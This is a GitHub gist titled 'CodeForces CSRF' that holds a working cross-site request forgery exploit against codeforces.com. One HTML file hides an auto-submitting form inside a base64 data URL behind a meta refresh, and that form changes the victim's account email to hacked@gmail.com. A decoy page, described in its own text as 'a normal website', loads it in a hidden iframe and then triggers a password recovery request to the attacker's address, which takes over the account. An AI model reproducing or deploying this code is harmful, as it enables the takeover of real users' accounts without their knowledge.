Skip to content

Instantly share code, notes, and snippets.

@MohamedBassem
Last active August 29, 2015 14:19
Show Gist options
  • Save MohamedBassem/cbbf60c1393bafe6052b to your computer and use it in GitHub Desktop.
Save MohamedBassem/cbbf60c1393bafe6052b to your computer and use it in GitHub Desktop.
CodeForces CSRF
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Refresh" content="2;url=data:text/html;charset=utf-8;base64,PGh0bWw+DQo8aGVhZD4NCjwvaGVhZD4NCg0KPGJvZHk+DQogIDxmb3JtIGFjdGlvbj0iaHR0cDov
L2NvZGVmb3JjZXMuY29tL3NldHRpbmdzL2dlbmVyYWwiIG1ldGhvZD0icG9zdCI+DQogICAgPGlu
cHV0IHR5cGU9InRleHQiIG5hbWU9ImNzcmZfdG9rZW4iIHZhbHVlPSIiIC8+DQogICAgPGlucHV0
IHR5cGU9InRleHQiIG5hbWU9ImFjdGlvbiIgdmFsdWU9InNhdmVDaGFuZ2VzIiAvPg0KICAgIDxp
bnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmdGFhIiB2YWx1ZT0iIiAvPg0KICAgIDxpbnB1dCB0eXBl
PSJ0ZXh0IiBuYW1lPSJiZmFhIiB2YWx1ZT0iIiAvPg0KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBu
YW1lPSJlbWFpbCIgdmFsdWU9ImhhY2tlZEBnbWFpbC5jb20iIC8+DQogICAgPGlucHV0IHR5cGU9
InRleHQiIG5hbWU9Im9sZFBhc3N3b3JkIiB2YWx1ZT0iIiAvPg0KICAgIDxpbnB1dCB0eXBlPSJ0
ZXh0IiBuYW1lPSJuZXdQYXNzd29yZCIgdmFsdWU9IiIgLz4NCiAgICA8aW5wdXQgdHlwZT0idGV4
dCIgbmFtZT0ibmV3UGFzc3dvcmRDb25maXJtYXRpb24iIHZhbHVlPSIiIC8+DQogICAgPGlucHV0
IHR5cGU9InRleHQiIG5hbWU9Im9wZW5JZCIgdmFsdWU9IiIgLz4NCiAgICA8aW5wdXQgdHlwZT0i
dGV4dCIgbmFtZT0idmtJZCIgdmFsdWU9IiIgLz4NCiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFt
ZT0idFNoaXJ0U2l6ZSIgdmFsdWU9IkwiIC8+DQogICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9
Im5vdGlmeUZvckNvbnRlc3QiIHZhbHVlPSJvbiIgLz4NCiAgICA8aW5wdXQgdHlwZT0idGV4dCIg
bmFtZT0ibm90aWZ5Rm9yVXNlclRhbGsiIHZhbHVlPSJvbiIgLz4NCiAgICA8aW5wdXQgdHlwZT0i
dGV4dCIgbmFtZT0ibm90aWZ5Rm9yQ29tbWVudCIgdmFsdWU9Im9uIiAvPg0KICAgIDxpbnB1dCB0
eXBlPSJ0ZXh0IiBuYW1lPSJyZW1lbWJlck9uRW50ZXJXaXRoRXh0ZXJuYWxJZCIgdmFsdWU9Im9u
IiAvPg0KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJzaG93UHJvYmxlbVRhZ3MiIHZhbHVl
PSJvbiIgLz4NCiAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ib2ZmZXJUb1B1Ymxpc2hSYXRp
bmdSaXNlcyIgdmFsdWU9Im9uIiAvPg0KICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJfdHRh
IiB2YWx1ZT0iMzAwIiAvPg0KICAgIDxpbnB1dCBpZD0iZG8taXQiIHR5cGU9InN1Ym1pdCIgLz4N
Cg0KICA8L2Zvcm0+DQo8L2JvZHk+DQoNCjxzY3JpcHQ+DQogIGRvY3VtZW50LmdldEVsZW1lbnRC
eUlkKCJkby1pdCIpLmNsaWNrKCk7DQo8L3NjcmlwdD4NCg0KPC9odG1sPg0K">
</head>
<html>
<head>
</head>
<body>
<form action="http://codeforces.com/settings/general" method="post">
<input type="text" name="csrf_token" value="" />
<input type="text" name="action" value="saveChanges" />
<input type="text" name="ftaa" value="" />
<input type="text" name="bfaa" value="" />
<input type="text" name="email" value="hacked@gmail.com" />
<input type="text" name="oldPassword" value="" />
<input type="text" name="newPassword" value="" />
<input type="text" name="newPasswordConfirmation" value="" />
<input type="text" name="openId" value="" />
<input type="text" name="vkId" value="" />
<input type="text" name="tShirtSize" value="L" />
<input type="text" name="notifyForContest" value="on" />
<input type="text" name="notifyForUserTalk" value="on" />
<input type="text" name="notifyForComment" value="on" />
<input type="text" name="rememberOnEnterWithExternalId" value="on" />
<input type="text" name="showProblemTags" value="on" />
<input type="text" name="offerToPublishRatingRises" value="on" />
<input type="text" name="_tta" value="300" />
<input id="do-it" type="submit" />
</form>
</body>
<script>
document.getElementById("do-it").click();
</script>
</html>
Codeforces CSRF
<h1>Hi</h1>
<h2>That's a normal website. Maybe?</h2>
<iframe src="changeMail.html" style="display:none;">
</iframe>
<script>
var xhr = new XMLHttpRequest();
var params = "csrf_token=&action=passwordRecovery&handleOrEmail=hacked@gmail.com&_tta:378";
xhr.open("POST", "http://codeforces.com/passwordRecovery", true);
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
setTimeout(function(){ xhr.send(params); }, 3000); // Waits for the email to be changed.
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment